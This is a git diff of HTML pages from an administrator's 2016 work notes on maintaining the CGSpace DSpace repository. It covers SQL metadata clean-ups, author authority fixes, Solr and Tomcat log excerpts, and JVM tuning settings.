-dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
UPDATE 164
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
UPDATE 7
- Had to run it twice to get all (not sure about “global” regex in PostgreSQL)
@@ -404,11 +404,11 @@ UPDATE 7
- I’m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn’t as good
- The results were very good, I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:
-$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
+$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
- In related news, I’m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace’s media filter has made thumbnails of THEM):
-dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
+dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
- I’m not sure if there’s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore…
@@ -464,7 +464,7 @@ UPDATE 7
One user says they are still getting a blank page when he logs in (just CGSpace header, but no community list)
Looking at the Catlina logs I see there is some super long-running indexing process going on:
-INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
+INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
[> ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
[> ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
[> ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
@@ -497,7 +497,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacete
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
-2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
+2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
2016-11-29 07:56:36,608 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
2016-11-29 07:56:36,701 INFO org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
diff --git a/docs/2016-12/index.html b/docs/2016-12/index.html
index 66713f242..f68cfbdf2 100644
--- a/docs/2016-12/index.html
+++ b/docs/2016-12/index.html
@@ -12,11 +12,11 @@
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
-2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
I’ve raised a ticket with Atmire to ask
@@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
-2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
I’ve raised a ticket with Atmire to ask
Another worrying error from dspace.log is:
"/>
-
+
@@ -137,11 +137,11 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
-2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
- I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
- I’ve raised a ticket with Atmire to ask
@@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
- The first error I see in dspace.log this morning is:
-2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
+2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
- Looking through DSpace’s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries
- The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:
-2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
+2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
2016-12-02 08:28:23,908 INFO org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
- DSpace’s own Solr logs don’t give IP addresses, so I will have to enable Nginx’s logging of
/solr
so I can see where this request came from
@@ -279,7 +279,7 @@ Result = The bitstream could not be found
- In other news, I’m looking at JVM settings from the Solr 4.10.2 release, from
bin/solr.in.sh
:
# These GC settings have shown to work well for a number of common Solr workloads
-GC_TUNE="-XX:-UseSuperWord \
+GC_TUNE="-XX:-UseSuperWord \
-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
@@ -296,7 +296,7 @@ GC_TUNE="-XX:-UseSuperWord \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled \
--XX:+AggressiveOpts"
+-XX:+AggressiveOpts"
- I need to try these because they are recommended by the Solr project itself
- Also, as always, I need to read Shawn Heisey’s wiki page on Solr
@@ -319,17 +319,17 @@ GC_TUNE="-XX:-UseSuperWord \
- Some author authority corrections and name standardizations for Peter:
-
dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
+dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
UPDATE 11
-dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
+dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
UPDATE 36
-dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
+dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
UPDATE 14
-dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
+dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
UPDATE 42
-dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
+dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
UPDATE 360
-dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
UPDATE 561
- Pay attention to the regex to prevent false positives in tricky cases with Dutch names!
@@ -343,7 +343,7 @@ UPDATE 561
- The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn’t dedicated (also runs Solr, which can benefit from OS cache) so let’s try 1024MB
- In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):
-$ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
+$ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@@ -377,30 +377,30 @@ sys 0m22.647s
Querying that ID shows the fields that need to be changed:
{
- "responseHeader": {
- "status": 0,
- "QTime": 1,
- "params": {
- "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
- "indent": "true",
- "wt": "json",
- "_": "1481102189244"
+ "responseHeader": {
+ "status": 0,
+ "QTime": 1,
+ "params": {
+ "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
+ "indent": "true",
+ "wt": "json",
+ "_": "1481102189244"
}
},
- "response": {
- "numFound": 1,
- "start": 0,
- "docs": [
+ "response": {
+ "numFound": 1,
+ "start": 0,
+ "docs": [
{
- "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
- "field": "dc_contributor_author",
- "value": "Grace, D.",
- "deleted": false,
- "creation_date": "2016-11-10T15:13:40.318Z",
- "last_modified_date": "2016-11-10T15:13:40.318Z",
- "authority_type": "person",
- "first_name": "D.",
- "last_name": "Grace"
+ "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
+ "field": "dc_contributor_author",
+ "value": "Grace, D.",
+ "deleted": false,
+ "creation_date": "2016-11-10T15:13:40.318Z",
+ "last_modified_date": "2016-11-10T15:13:40.318Z",
+ "authority_type": "person",
+ "first_name": "D.",
+ "last_name": "Grace"
}
]
}
@@ -409,51 +409,51 @@ sys 0m22.647s
I think I can just update the value
, first_name
, and last_name
fields…
The update syntax should be something like this, but I’m getting errors from Solr:
-$ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
+$ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
{
- "responseHeader":{
- "status":400,
- "QTime":0},
- "error":{
- "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
- "code":400}}
+ "responseHeader":{
+ "status":400,
+ "QTime":0},
+ "error":{
+ "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
+ "code":400}}
- When I try using the XML format I get an error that the
updateLog
needs to be configured for that core
- Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?
-dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
UPDATE 561
- Then I’ll reindex discovery and authority and see how the authority Solr core looks
- After this, now there are authorities for some of the “Grace, D.” and “Grace, Delia” text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):
-$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
+$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
{
- "responseHeader":{
- "status":0,
- "QTime":0,
- "params":{
- "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
- "indent":"true",
- "wt":"json"}},
- "response":{"numFound":1,"start":0,"docs":[
+ "responseHeader":{
+ "status":0,
+ "QTime":0,
+ "params":{
+ "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
+ "indent":"true",
+ "wt":"json"}},
+ "response":{"numFound":1,"start":0,"docs":[
{
- "id":"18ea1525-2513-430a-8817-a834cd733fbc",
- "field":"dc_contributor_author",
- "value":"Grace, Delia",
- "deleted":false,
- "creation_date":"2016-12-07T10:54:34.356Z",
- "last_modified_date":"2016-12-07T10:54:34.356Z",
- "authority_type":"person",
- "first_name":"Delia",
- "last_name":"Grace"}]
+ "id":"18ea1525-2513-430a-8817-a834cd733fbc",
+ "field":"dc_contributor_author",
+ "value":"Grace, Delia",
+ "deleted":false,
+ "creation_date":"2016-12-07T10:54:34.356Z",
+ "last_modified_date":"2016-12-07T10:54:34.356Z",
+ "authority_type":"person",
+ "first_name":"Delia",
+ "last_name":"Grace"}]
}}
- So now I could set them all to this ID and the name would be ok, but there has to be a better way!
- In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!
- Better to use:
-dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
- This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!
- Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID
@@ -461,17 +461,17 @@ UPDATE 561
- Deploy “take task” hack/fix on CGSpace (#290)
- I ran the following author corrections and then reindexed discovery:
-update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
-update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
-update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
-update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
-update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
-update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
+update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
+update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
+update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
+update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
+update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
2016-12-08
- Something weird happened and Peter Thorne’s names all ended up as “Thorne”, I guess because the original authority had that as its name value:
-dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
text_value | authority | confidence
------------------+--------------------------------------+------------
Thorne, P.J. | 18349f29-61b1-44d7-ac60-89e55546e812 | 600
@@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
